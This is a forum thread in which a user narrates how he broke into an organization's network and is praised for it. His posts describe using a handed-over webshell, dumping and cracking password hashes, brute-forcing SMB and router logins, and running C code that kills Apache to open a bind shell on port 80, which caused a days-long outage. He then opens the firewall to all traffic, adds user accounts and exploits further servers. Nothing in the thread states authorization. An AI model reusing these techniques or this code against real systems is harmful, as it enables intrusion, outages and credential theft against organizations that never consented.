Page 1 of 3 123 LastLast
Results 1 to 10 of 29

Thread: Bypassing a Cisco IOS firewall Share/Save - My123World.Com!

  1. #1
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32

    Bypassing a Cisco IOS firewall

    This documentation is about a successful attack Strategy on something which I was trying out form last 15 days. It all started with silent-poison handing over to me a webshell, "a non interactive .php shell" on a webserver the shell was having NT-Authority System privileges. He did a good work there, as I was told he used a joomal exploit to get that shell up running. And it was obviously a high priority webserver .He should probably document that part .

    The issue he was facing was that he was not able to back connect nor use bind shell to get an interactive command prompt. Well yes it would be definitely be because of a proxy/Firewall/Nating issues.

    Day 1:

    All I am having is a web shell with privileges to execute commands, it was a windows 2008 serevr . I started by doing an external nmap
    Code:
    fb1h2s@bktrack:~#nmap -T4 -A targetip
    
    "which will generate a full scan including tracert and  script scans"
    
    Out put was:
    
    TCp Port : 80 Open
    No filtered ports but just an open port,as normally if firewalled windows RPC ports would be filtered .Himm should be a Router ACL configured with no outbound connections and Only allow inbound connection on port 80

    For confirming I uploaded a command line port-scanner, not nmap as I am not having interactive command prompt and configuring namp+wincap on non interactive setup is hard so dint wanted to take that pain.

    I uploded Found ScanLine v1.01 http://www.foundstone.com/us/resourc...c/scanline.htm and did banner garbing on the device which is doing the Nating

    Code:
    ipconfig > found the device ip 192.168.0.1
    
    sl -vbt 192.168.0.1
    
    Starting scan against 192.168.0.1 port range: 1-5000
    Total number of maximum threads is 20. Socket timeout is set to 20ms.
    Port 1720 is open.
    -- End of open TCP ports list.
    
    Cisco IOS firewall
    
    192.168.0.1
    Responded in 0 ms.
    0 hops away
    Responds with ICMP unreachable: No
    TCP ports: 23 80 1720
    Before starting I dumped the admin/user hashes using http://www.foofus.net/~fizzgig/fgdump/fgdump-usage.htm and cracked online using https://www.objectif-securite.ch/en/products.php
    Which by the way was Admin@internal-ip-last-octet seems like I might have more chance for similar passwords

    So problem maker is a cisco Ios firewall . So I have to bypass this one to get an interactive shell Rdp,commd prompt etc. And the question is how ??

    Day 2

    It took two days to build an option set

    [+]Few solutions I could think about was
    [1]Get access to firewall by Brute-forcing password or some other means modify the acess list to.
    Code:
    access-list 101 permit tcp any host 171.16.23.1 eq 3389
    [Hard?impossible form a non interactive shell ] And bruteforce program and all I ill have to code in native C/C++ which I wasn't that fast in doing [I am in love with python ]

    [2] Find another system in the network which might have internet acess like Mail serevr Dns servers hack them then tunnel firewalled machines traffic and take it out to the internet and get interactive shell.

    [3] DNS tunneling and Port reuse http://www.blackhat.com/presentation..._Shellcode.pdf Metsploit got DNs tunneling payloads. "You cant achieve fully interactive shell"

    And from these I choose the second option. So now I have to spot system with which might have direct internet access.

    Code:
    ipconfig /all Give me my Internal Dns server IP.
    
    192.168.0.4
     I also did a Portscan on my subnet which gave me the Dns names too
    " Dns names changed"
    
    192.168.0.4     
    Hostname: INTERNALSERVER
    Responded in 0 ms.
    0 hops away
    Responds with ICMP unreachable: No
    
    -------------------------------------------------------------------------------
    
    -------------------------------------------------------------------------------
    192.168.0.17
    Hostname: INTER2SERVER
    Responded in 0 ms.
    0 hops away
    Responds with ICMP unreachable: No
    
    -------------------------------------------------------------------------------
    192.168.0.18 
    Hostname: ipcam-client
    Responded in 0 ms.
    0 hops away
    Responds with ICMP unreachable: No
    Starting scan against 192.168.0.18 port range: 1-5000
    Total number of maximum threads is 50. Socket timeout is set to 3ms.
    Port 22 is open.
    Port 80 is open.
    Port 443 is open.
    Port 554 is open.
    Port 2112 is open.
    Port 3306 is open.
    Port 4112 is open.
    Port 4116 is open.
    Port 4343 is open.
    -- End of open TCP ports list.
    
    -------------------------------------------------------------------------------
    192.168.0.246
    Hostname: MYBOOKWORLD
    Responded in 0 ms.
    0 hops away
    Responds with ICMP unreachable: No
    
    -------------------------------------------------------------------------------
    
    Scan finished at Thu Nov 25 15:34:20 2010
    
     --------------------------------------------------------------------------
    192.168.0.18
    Responded in 0 ms.
    0 hops away
    Responds with ICMP unreachable: No
    TCP ports: 22 80 443 554 2112 3306 4112 4116 4343
    
    --------------------------------------------------------------------------
    192.168.1.4
    Hostname: exch.my.target.com
    Responds with ICMP unreachable: No
    192.168.1.4
    Responded in 0 ms.
    1 hop away
    Responds with ICMP unreachable: No
    TCP ports: 21 25 53 80 88 110 135 139 143 389 443 445 464 593 636 993 995 1025 1027 1038 1054 1058 1060 1066 1069 1107 1111 1123 1129 1163 1201 1219 1801 2101 2103 2105 2107 3171 3172 3173 3268 3269 3389
    Hacking Is a Matter of Time Knowledge and Patience

  2. #2
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Seems like I spotted what I wanted an Exchange mail server of target with Dns name exch.my.target.com
    And another good news is there is quite a huge no of servers inside the network,
    Including a Survilance Camera System and a I TB data server using "MYBOOKWORLD"
    192.168.0.18
    Hostname: ipcam-client "Lets come back to this later"

    So now I knew the DNS name of there mail server ,
    till date I haven't seen an organization using 2 different Dns names for mail servers Internal and external so high possibility that we would be able to get the External IP address form this DNS name
    .

    I typed on my browser the mail Domain name exch.mytarget.com and yuhu targets Microsoft Exchange webmail login poped opned . So now I have my target . Time to see if its fire-walled or not.

    Code:
    Nmap -T4 -A IP
    Hacking Is a Matter of Time Knowledge and Patience

  3. #3
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32


    Fiar enough so now this is would be the target to hack. A quick looking up also revealed that target mail server was also there Domain controller how stupid is that. And what the point in putting a firewall in front off web server and not doing anything to this Mail/Domain server, Sad but good for me.

    Nmaps Smb bruter module gives good results. So that if I could crack an account then I could use it to excute commands using Pstools
    http://technet.microsoft.com/en-us/s.../bb896649.aspx

    Code:
    psexec  -u user -p password \\marklap command
    So did an nmap smbruter and Good news was got two successful logins
    Code:
    nmap --script smb-brute.nse -p445


    And bad news was that none of the users were privileged enough to get command execution .

    I did little more pocking around with the mail server found out the snmb community string was public only used Snmpenum, listed updates and checked if any was missiing, that too dint worked.
    Hacking Is a Matter of Time Knowledge and Patience

  4. #4
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Trying to compromise it dint succeed. And got exhausted. See my motive is to attain Interactive shell on that webserver. So I din't spend more time with the mail server and started thinking about a different one.

    [+] Plan 1,2,3 flopped for me so need to make a new plan
    [-] Curent scenario is the Nating is taking place in the Cisco firewall where connections are forwarded to internal Ip and Cisco ACL is configured in such a way that.
    Code:
    access-list 101 permit tcp any host 171.16.23.1 eq 80
    --> allows connection on port 80 
    access-list 101 deny tcp any host 171.16.23.1 eq any
    --> deny any other connections on any other port
    You could read a good doc abt ACLs here http://www.cisco.com/en/US/tech/tk64...80100548.shtml

    [-]So connections to port 80 would be accepted and forwarded to internal computer. As the Webserevr running Apache is using port 80 we cant bind a port on the 'inused' port .
    Some were I have read a used port reuse methodology ,
    dint get it though
    Hacking Is a Matter of Time Knowledge and Patience

  5. #5
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Solution
    Stupid Most Idea
    We cant use port 80 as its been used by apache but if we could shut down apache and make a Command bind shell on port 80 then we could simply telnet to the server and get an interactive command prompt, firewall wont even say a word .

    Well my idea was dump but if that would satisfy my needs then that would be all enough.

    Setting up the plan
    1) Make a bind shell using metsploit bind to internal machines Ip on port 80
    2) Make another program which will kill http and call our bind shell and loop through the process so that we wont loose control over web shell.
    3) Make sure that my plan is working fine, by testing/verifying it on local machine. If anything goes wrong then we will end up with nothing.
    4) And also excute the plan only at midnight when no traffice to that web server is there, verify that with netsta -a and do accordingly

    [+] A small code to do stuff was built

    Code:
    //winexec.c
    ///stupid code by fb1h2s
    //well not leet but idea works :D
    #include<windows.h>
    #include<time.h>
    int main(int argc, char** argv)
    {
    int running =1;
    
    while(1 ==1)
    {
                 
    system("taskkill /IM httpd.exe /F");  // kill http      
    WinExec("bind.exe", SW_SHOWNORMAL); // call windows bind shell port 80 
    Sleep(250000);              // lets hang out with intractive command prompt for 4 mins //and try  to compromise firewall
    system("taskkill /IM bind.exe /F");  // kill bind shell
    WinExec("C:\\pathonwebserver\\apache\\bin\\httpd.exe", SW_SHOWNORMAL);
    //bring back http server my work is done and let continue after some time
    Sleep(150000);
    }
    
    }
    Hacking Is a Matter of Time Knowledge and Patience

  6. #6
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Once code was built I tested on my local system, all these with the assumption that a CBAC Context based acesslist is in use http://www.cisco.com/en/US/docs/ios/...ll.html#wp8216 is created normally its CABC only.
    and everything worked fine.

    Uploaded Bind shell and uploaded winexec.exe binary and all in place. I executed

    Code:
    winexec.exe
    Boom Apache went down as planned so as the webshell , now I tried to telnet to port 80 of target , screwed noting works, not getting any Command prompt back, waited for 5 mins to get back my http server, that too dint work, Screwed royally

    Its only after that I understood my stupidity
    1) winexec.exe is called form command line via php--> cmd.exe /winexec.exe
    2)When winexec.exe excutes it kills appache there by php and ends calling terminal cmd.exe
    3) so no calls to bind.exe is made
    4) when I tested on my local machine I only tested it by running the codes manually dint call it form webshell.

    I could have planned and taught a little more.All I needed to do was make another program "callwinexec.exe" which called winexec.exe and run "callwinexec.exe" from webshell
    And not doing thats consequences was that the webserver was down for 5 days . And I waited anxiously checking every day whether the site was back up or not.
    So back on 9th day server was up again.
    Irresponsible admins why would they need 5 days to restart apache
    Hacking Is a Matter of Time Knowledge and Patience

  7. #7
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Now the time for real woot woot ,
    Uploaded programs to server and triggered callwinexec.exe

    Result was:


    So command prompt is achieved, and a quick bruteforce on the routers telnet was done remember I have mentioned the admin password of the webserver was Admin@ip-adress-last-octect so same stuff worked on the router to. That was quick . And I modified acesslist enabled any to any on the router. I used the http://www.cisco.com/en/US/tech/tk64...80100548.shtml

    And used google to do most of the stuffs.

    So any to any acess is granted and rdp also was available.
    I had issues with logging in, as the webadmin had left a rdp session unclosed so had to use this tutorial to get past it http://retrohack.com/killing-rdp-ses...-the-cmd-line/
    And I did another stupid thing that was installing python for further exploitations. which was discovered by admin the next day and took down server for maintenance for one day and changed the admin password also he made the NT+LM hashes unavailable, but dint figure out the router thing.

    So next day night I had to get a bind shell back and as I dint know the password and only NT hashes were available I had to use
    Code:
    net user user new password
    net user /add
    tricks
    which still work on windows server 2008
    to get a new user and used Remote Desktop to to connect to it. MY aim was already complected but my curiosity of seeing the rest of the servers in the network made me install Nessus and Nmap on tht serevr.
    Nessue 4 will have issues with flash via rdp , as you need to install a stand alone version of flash for IE to acess flash via RDP

    As I already had made the list of alive IPs using foundstone scan line on the very first days itself, segregated the Ips list and passed them to nessus and nmap.

    16th Day that was yesterday
    Owned 4 more servers inside using three different exploits.
    I am not going in detail about those stuffs coz am tired writing + you could google about them. Or will detail abt Jboss exploit in some other article.
    1) ms08-067 used a public version of the code
    2) Jboss console was there on another win 2008 server 0wned that too.
    https://issues.jboss.org/browse/ASPA...story-tabpanel
    3) Microsoft Windows SMB Shares Unprivileged Access
    4)Password brute fore Admin@ip worked on another machine too.


    I was hacking like a mad ass for the last 15 days. Though my primary target inside was a CISCO VOSM surveillance camera management server, I could not reach there. It was a linux machine and am not that good remotely exploiting linux.

    And today I got a confirmation form Null Con folks confirming that my paper on "Penetration testing Biometric system " was selected so had to work on that and wont be able to continue with this one . So just taught of documenting the work so it will save some one Else's time in places where I lagged.

    And am thanking all the good fellow hackers of Garage4hackers and others whom I bugged these days asking my doubts, who all helped me out in circumstances .
    B0nd,Eberly,wipu,webd3vil,sagar.belure,vinnu and
    greetz to garage members : silenpoison(special one for starting it), w4ri0r,empty,neo,Rohith,Sids786,d4rkest,SmartKD,Ti a,h@xor,Atul,prasant,micro,nishant.
    And obviously to my sweet girl friend who calls me busy geek and knows that am not a good BF, but still loves me .

    I always add this greetz part to wht ever I post

    PDF Version Attached:
    Hacking Is a Matter of Time Knowledge and Patience

  8. #8
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744

    U r a monster !!!

    Yeah fb. Couple of days back empty told me about your idea of stopping the web server and running own code as only web port was allowed through firewall. That part I found deadly!!!

    You fall under the category of "determined hackers" and it is just next to impossible to stop such brains
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  9. #9
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    EPIC ..... this topic is bookmarked for reference ... One of the most epic post in garage
    Spirit was turned 2 ashes ,soul endured so much pain..
    now the darker time evanescence ,the fallen shall rise again.

  10. #10
    Mind-blowing ..really, fb1h2s is a "determined hacker"
    The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison
    __________________________________________________ _____________________

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •